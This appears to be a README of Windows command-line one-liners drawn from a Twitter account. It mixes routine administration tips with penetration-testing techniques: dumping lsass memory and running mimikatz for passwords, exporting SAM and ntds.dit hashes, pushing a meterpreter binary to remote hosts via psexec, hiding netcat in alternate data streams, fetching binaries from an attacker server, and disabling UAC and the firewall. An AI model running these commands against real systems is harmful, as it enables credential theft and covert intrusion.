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Windows one line commands that make life easier, shortcuts and command line fu.

Windows CLI gems. Tweets of @wincmdfu

Windows one line commands that make life easier, shortcuts and command line fu.

Table of Contents

  • Get entires from IPv4 neighbor cache
  • Get available wireless networks via cmd and netsh
  • Quick list IP addresses only
  • List ALL services AND their binaries
  • Export SAM from the Windows Registry to a file
  • Enable remote desktop using reg
  • Enable the boot log to see list of drivers loaded during startup
  • Powershell cmdlet to create System Restore Point
  • Check the current account for seDebugPrivilege
  • Enable/disable system users via command line
  • View process that is consuming the most memory using powershell
  • Create an Alternate Data Stream from a file on an NTFS partition
  • Export running processes in CSV format
  • Lock Windows desktop using command line
  • Start explorer with a file or folder selected/highlighted
  • Dump VirtualBox image containing RAM and ELF headers
  • Set Time Zone of the system clock
  • Make folder inside a guest from the host
  • Force copy meterpreter binary to remote machines & run as system
  • Create n/w share called Apps, with read access & limit to 10 conns
  • List all the drives under My Computer using fsutil
  • Troubleshoot n/w packet drops with router statistics using pathping
  • List unsigned dlls for a specific process. For system wide list
  • Obtain a list of Windows XP computers on the domain using PS
  • Open the System Properties window, with the Advanced tab selected
  • Using the dir command to find Alternate Data Streams
  • Use procdump to obtain the lsass process memory
  • Run mimikatz in minidump mode & use mini.dmp from procdump
  • Get list of startup programs using wmic
  • Add a binary to an Alternate Data Stream
  • Execute a binary Alternate Data Stream Win 7/2008 using wmic
  • Show config & state info for Network Access Protection enabled client
  • Get computer system information, including domain name and memory, using wmic
  • Use the Package Manager in Windows to install the Telnet client on Windows Vista & higher
  • Secure delete a file/folder in Windows
  • Show all startup entries while hiding Microsoft entries. CSV output
  • Download files via commandline using PS
  • Fetch the last 10 entries from the Windows Security event log, in text format
  • Create a dll that runs calc on invoke
  • Run a command as another user
  • Get shutdown/reboot events from the last 1000 log entries using PS
  • Create a new snapshot of the volume that has the AD database and log files
  • Mount the snapshot
  • Run a process on a remote system using wmic
  • List the machines, with usernames, that were connected via RDP
  • List all process that are running on your system by remote users connected via RDP
  • Reset the Windows TCP\IP stack
  • List logged on users
  • Set a static IP on a remote box
  • Bypass powershell execution policy restrictions
  • List running processes every second on a remote box
  • Get a list of running processes and their command line arguments on a remote system
  • Remotely enable and start the Volume Shadow Copy Service
  • Ping multiple IPs from ips.txt & see live hosts
  • Set global proxy in Windows to point to IE proxy
  • Enumerate list of drivers with complete path information
  • View Group Policy Objects that have been applied to a system
  • Reset the WMI repository to what it was when the OS was installed
  • Create symbolic links in Windows Vista, 7 & higher
  • Enable the tftp client in Vista & higher
  • Obtain list of firewall rules on a local system
  • Get name of current domain controller
  • Look at content cached in kernel mode on IIS 7 and higher
  • Quick test to check MS15_034
  • Get a list of all open Named pipes via Powershell
  • Possible VENOM detection on VirtualBox
  • List RDP sessions on local or remote in list format
  • Get a list of service packs & hotfixes using wmic for remote systems listed in file
  • Export wireless connection profiles
  • Unzip using PowerShell
  • Open the Network & Sharing center
  • Remotely stop/start ftp on several systems
  • To quickly find large files using cmd
  • Print RDP connections
  • List scheduled tasks & binaries
  • Display the "Stored User names and Passwords" window
  • List namespaces & classes in WMI via PowerShell
  • Convert Between VDI, VMDK, VHD, RAW disk images using VirtualBox
  • Change file extensions recurseively
  • List IPs of running VirtualBox machines
  • Windows Privilege Escalation
  • Enumerate packages with their oem inf filenames
  • Install a driver package using inf file
  • Malware Hunting with Mark Russinovich and the Sysinternals
  • Windows Nano Server APIs
  • Windows wifi hotspot using cmd
  • Disable UAC via cmdline
  • Turn off Windows firewall for all profiles
  • List Missing Updates
  • Export SAM and SYSTEM. Dump password hashes offline
  • Convert Binary to base64 string to transfer across restricted RDP
  • Convert Base64 string to Binary
  • List services running as SYSTEM and possibly weak file permissions
  • Check Bitlocker status on a remote box
  • Export failed logon attempts
  • Alternate Data Streams and PS
  • Run the Windows Assessment tool for cpu and ram and disk
  • Port forward (proxy) traffic to remote host and port
  • Enable/Disable NetBIOS over TCP/IP
  • Compact multiple VDI files across folders
  • Full scan using WinDefender
  • Generate 32 char random password

Get entires from IPv4 neighbor cache

C:\>netsh interface ipv4 show neighbors

Get available wireless networks via cmd and netsh

C:\>netsh wlan show networks mode=b

Quick list IP addresses only

Save the following in ip.bat in %PATH%

C:\>ipconfig | find /I "pv"

Call ip from CLI

List ALL services AND their binaries

for /F "tokens=2* delims= " %i in ('sc query ^| find /I "ce_name"') do @sc qc %i %j

Export SAM from the Windows Registry to a file

C:\>reg save HKLM\SAM "%temp%\SAM.reg"

Enable remote desktop using reg

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Enable the boot log to see list of drivers loaded during startup

bcdedit /set bootlog yes

Read via %windir%\ntbtlog.txt

Powershell cmdlet to create System Restore Point

PS C:\>Checkpoint-Computer -description "Restore point!"

Check the current account for seDebugPrivilege

C:\> whoami /priv | findstr "Debug"

For all privs:

C:\> whoami /priv

Enable/disable system users via command line

C:\>net user test /active:yes (no)

Get full help on the net user command:

C:\>net help user

View process that is consuming the most memory using powershell

PS C:\> (Get-Process | Sort-Object -Descending WS)[0]

Create an Alternate Data Stream from a file on an NTFS partition

C:\>type data.txt > C:\windows\explorer.exe:newads.txt

Export running processes in CSV format

C:\> tasklist /FO CSV > tasks.txt

Lock Windows desktop using command line

C:\> rundll32 user32.dll,LockWorkStation

Start explorer with a file or folder selected/highlighted

C:\> explorer /select,C:\MyData\sample.docx

Dump VirtualBox image containing RAM and ELF headers

C:\>vboxmanage debugvm "WinXPLab1" dumpguestcore --filename winxplab1.elf

Set Time Zone of the system clock

C:\> tzutil /s "Eastern Standard Time"

List available Time zones:

C:\> tzutil /l

Make folder inside a guest from the host


C:\> vboxmanage guestcontrol "WinXP" md "C:\\test" --username "user" --password "pass"

Force copy meterpreter binary to remote machines & run as system

C:\> psexec @$ips.txt -s -u adminuser -p pass -f -c \exploits\mp.exe

Create n/w share called Apps, with read access & limit to 10 conns

C:\> net share Apps=C:\Apps /G:everyone,READ /US:10

List all the drives under My Computer using fsutil

C:\> fsutil.exe fsinfo drives

Troubleshoot n/w packet drops with router statistics using pathping

C:\> pathping -n

List unsigned dlls for a specific process.

For system wide list, remove the process name

C:\> listdlls -u explorer.exe

Obtain a list of Windows XP computers on the domain using PS


PS C:\> Get-ADComputer -filter {OperatingSystem -like "*XP*"}

Open the System Properties window, with the Advanced tab selected

Change the number for different tabs

C:\> control sysdm.cpl,,3

Using the dir command to find Alternate Data Streams

C:\> dir /R | find ":$D"

Using streams sysinternals (shows path):

C:\> streams -s .

Use procdump to obtain the lsass process memory.

Use mimikatz minidump to get passwords

C:\> procdump -accepteula -ma lsass.exe mini.dmp

Run mimikatz in minidump mode & use mini.dmp from procdump

mimikatz # sekurlsa::minidump mini.dmp
mimikatz # sekurlsa::logonPasswords

### Get list of startup programs using wmic

C:> wmic startup list full

### Add a binary to an Alternate Data Stream

C:> type c:\tools\nc.exe > c:\nice.png:nc.exe

Execute it (XP/2K3):

C:> start c:\nice.png:nc.exe

### Execute a binary Alternate Data Stream Win 7/2008 using wmic

C:> wmic process call create C:\nice.png:nc.exe

### Show config & state info for Network Access Protection enabled client

C:> netsh nap client show configuration

### Get computer system information, including domain name and memory, using wmic

C:> wmic computersystem list /format:csv

### Use the Package Manager in Windows to install the Telnet client on Windows Vista & higher

C:> pkgmgr /iu:"TelnetClient"

### Secure delete a file/folder in Windows


C:> sdelete -p 10 a.txt

To recursively delete folders:

C:> sdelete -10 -r C:\data\

### Show all startup entries while hiding Microsoft entries. CSV output

**It covers more locations than Windows inbuilt tools**

C:> autorunsc -m -c

### Download files via commandline using PS

PS C:> ipmo BitsTransfer;Start-BitsTransfer -Source http://foo/nc.exe -Destination C:\Windows\Temp\

### Fetch the last 10 entries from the Windows Security event log, in text format

C:> wevtutil qe Security /c:10 /f:Text

**def is XML**

### Create a dll that runs calc on invoke

msfpayload windows/exec cmd=calc.exe R | msfencode -t dll -o rcalc.dll

C:> rundll32.exe rcalc.dll,1

### Run a command as another user

**You will be prompted for password**

C:> runas /noprofile /user:domain\username "mmc wf.msc"

### Get shutdown/reboot events from the last 1000 log entries using PS

Get-EventLog -log system -n 1000 | Where {$_.eventid -eq '1074'} | fl -pr *

### Create a new snapshot of the volume that has the AD database and log files

C:> ntdsutil sn "ac i ntds" create quit quit

### Mount the snapshot

**Copy ntds.dit from snapshot & System hive from reg for pwd hashes**

C:> ntdsutil snapshot "list all" "mount 1" quit quit

### Run a process on a remote system using wmic

C:> wmic /node:ip process call create "net user dum dum /add"

### List the machines, with usernames, that were connected via RDP

C:> reg query "HKCU\Software\Microsoft\Terminal Server Client\Servers" /s

### List all process that are running on your system by remote users connected via RDP

C:> query process *

### Reset the Windows TCP\IP stack

netsh int ip reset c:\tcpresetlog.txt

### List logged on users. 

**Very useful during a pentest to look for domain admins**

C:> net session | find "\"

### Set a static IP on a remote box

C:> wmic /node:remotebox nicconfig where Index=1 call EnableStatic (""), ("")

### Bypass powershell execution policy restrictions

PS C:> powershell -ExecutionPolicy Bypass -Noninteractive -File .\lastboot.ps1

### List running processes every second on a remote box

C:> wmic /node:target process list brief /every:1

**Remove `/node:target` for localhost**

### Get a list of running processes and their command line arguments on a remote system

C:> wmic /node:target process get commandline, name

### Remotely enable and start the Volume Shadow Copy Service

C:> sc \target config vss start= auto C:> sc \target start vss

### Ping multiple IPs from `ips.txt` & see live hosts

C:>for /F %i in (ips.txt) do ping -n 1 %i | find "bytes="

### Set global proxy in Windows to point to IE proxy

C:> netsh winhttp import proxy source=ie

### Enumerate list of drivers with complete path information

C:> driverquery /FO list /v

### View Group Policy Objects that have been applied to a system
**Very useful during pentests**

C:> gpresult /z /h outputfile.html

### Reset the WMI repository to what it was when the OS was installed

**Very helpful if you have a corrupt repo**

C:> winmgmt /resetrepository

### Create symbolic links in Windows Vista, 7 & higher

C:> mklink C:> mklink D:\newlink.txt E:\thisexists.txt

### Enable the tftp client in Vista & higher

C:> ocsetup TFTP /quiet

Pull files to a `compromised server`:

C:> tftp -i attacksrv get bin.exe

### Obtain list of firewall rules on a local system

C:> netsh advfi fi sh rule name=all

**Can be combined with wmic for remote systems**

### Get name of current domain controller

C:> set log C:> nltest /dcname:DOMAIN

Get list of all DCs:

C:> nltest /dclist:DOMAIN

### Look at content cached in kernel mode on IIS 7 and higher

C:> netsh http sh ca

**Useful when investigating the `MS15-034` HTTP.sys vuln**

### Quick test to check `MS15_034`

C:> curl -v -H "Range: bytes=234234-28768768" "http://host/a.png" -o a.png

**HTTP 416 = Vulnerable**

**HTTP 20X = Not vulnerable**

### Get a list of all open Named pipes via Powershell

PS C:> [http://System.IO.Directory ]::GetFiles("\.\pipe\")

### Possible `VENOM` detection on VirtualBox

C:> vboxmanage list -l vms > a.txt

**Search 'Storage' & 'Floppy'**

### List RDP sessions on local or remote in list format

PS C:> qwinsta /server: | foreach {($_.trim() -replace "\s+",",")} | ConvertFrom-Csv

### Get a list of service packs & hotfixes using wmic for remote systems listed in file

C:> wmic /node:@file /output:out.txt qfe list full

### Export wireless connection profiles

C:> netsh wlan export profile

**`key=clear` allows plain text passwords**

### Unzip using PowerShell

PS C:> Add-Type -A System.IO.Compression.FileSystem;[IO.Compression.ZipFile]::ExtractToDirectory(src,dst)

### Open the Network & Sharing center

control.exe /name Microsoft.NetworkandSharingCenter

**Create a shortcut of this as `ns` in `PATH` for ease**

### Remotely stop/start ftp on several systems

C:> wmic /node:@ips.txt /user:u /password:p process call create "net msftpsvc"

### To quickly find large files using cmd

C:> forfiles /s /c "cmd /c if @fsize gtr 100000 echo @path @fsize bytes"

**Run from the dir you want**

### Print RDP connections

for /f "delims=" %i in ('reg query "HKCU\Software\Microsoft\Terminal Server Client\Servers"') do reg query "%i"

### List scheduled tasks & binaries

C:> schtasks /query /fo LIST /v

**Weak permissions can be exploited for `localprivilege escalation`**

### Display the "Stored User names and Passwords" window

C:> rundll32 keymgr.dll,KRShowKeyMgr

### List namespaces & classes in WMI via PowerShell

PS C:> gwmi -n root -cl __Namespace | Select name

PS C:> gwmi -n root\cimv2 -li

### Convert Between VDI, VMDK, VHD, RAW disk images using VirtualBox

C:> vboxmanage clonehd myvdi.vdi myvmdk.vmdk --format VMDK

### Change file extensions recurseively 

**csv to xls for eg**

C:\Projects> forfiles /S /M *.csv /C "cmd /c ren @file @fname.xls"

### List IPs of running VirtualBox machines

for /F %i in ('VBoxManage list runningvms') do VBoxManage guestproperty enumerate %i | find "IP"

### Windows Privilege Escalation

[![Windows Privilege Escalation](images/windows-privilege-esclation.png)](

### Enumerate packages with their oem inf filenames

C:> pnputil -e

### Install a driver package using inf file

C:> pnputil -i -a path_to_inf

### Malware Hunting with Mark Russinovich and the Sysinternals

[![Malware Hunting with Mark Russinovich and the Sysinternals Tools](](

### Windows Nano Server APIs


### Windows wifi hotspot using cmd

Starting a wifi hotspot using Windows cmd with ssid name `hotspotname` and key `password`

![Windows wifi hotspot using cmd](images/wifihotspot.jpg)

### Disable UAC via cmdline

C:> reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v EnableLUA /t REG_DWORD /d 0 /f

### Turn off Windows firewall for all profiles

**Useful if you have a bind shell**

C:> netsh advfirewall set allprofiles state off

### List Missing Updates

PS C:> (New-Object -c Microsoft.Update.Session).CreateUpdateSearcher().Search("IsInstalled=0").Updates|Select Title

### Export SAM and SYSTEM Dump password hashes offline


### Convert Binary to base64 string to transfer across restricted RDP

PS C:> [Convert]::ToBase64String((gc -Pa "a.exe" -En By))

### Convert Base64 string to Binary

PS C:> sc -Path "a.exe" -Val ([Convert]::FromBase64String((gc -Pa "b64.txt" ))) -En By

### List services running as SYSTEM and possibly weak file permissions

wmic service where StartName="LocalSystem"|findstr /IV ":\WIN :\PROG"

### Check Bitlocker status on a remote box

manage-bde -status -cn

Use `wmic /node:@ips.txt` & `process` alias for multiple.

### Export failed logon attempts

PS C:> Get-EventLog -Log Security | ?{$_.EntryType -eq 'FailureAudit'} | epcsv log.csv

### Alternate Data Streams and PS

- List all ADS for all files in current dir

PS C:> gi * -s *

- Read ADS

PS C:> gc -s <ADSName>

- Create ADS using text input

PS C:> sc -s <ADSName>

- Delete ADS

PS C:> ri -s <ADSName>

### Run the Windows Assessment tool for cpu and ram and disk

C:> winsat cpuformal -v C:> winsat memformal -v C:> winsat diskformal -v

### Port forward (proxy) traffic to remote host and port

C:> netsh int p add v4tov4 <LPORT> <RHOST> [RPORT] [LHOST]

### Enable/Disable NetBIOS over TCP/IP

Step 1. Get Index of Network Adapter: C:> wmic nicconfig get caption,index

Step 2. Use the index C:> wmic nicconfig where index=1 call SetTcpipNetbios 1

0-Def 1-En 2-Dis

### Compact multiple VDI files across folders

C:> for /F %i in ('dir /b /s *.vdi ^| find ".vdi"') do vboxmanage modifyhd --compact %i

### Full scan using WinDefender

C:>"%ProgramFiles%\Windows Defender\MpCmdRun.exe" -scan -scantype 2

Use #wmic /node:@ips process for multiple.

### Generate 32 char random password

Save as genpass.ps1

PS C:> (char[]|sort{Get-Random})[0..32] -join ''

## Contribution

Please read the [contribution guidelines]( if you want to contribute.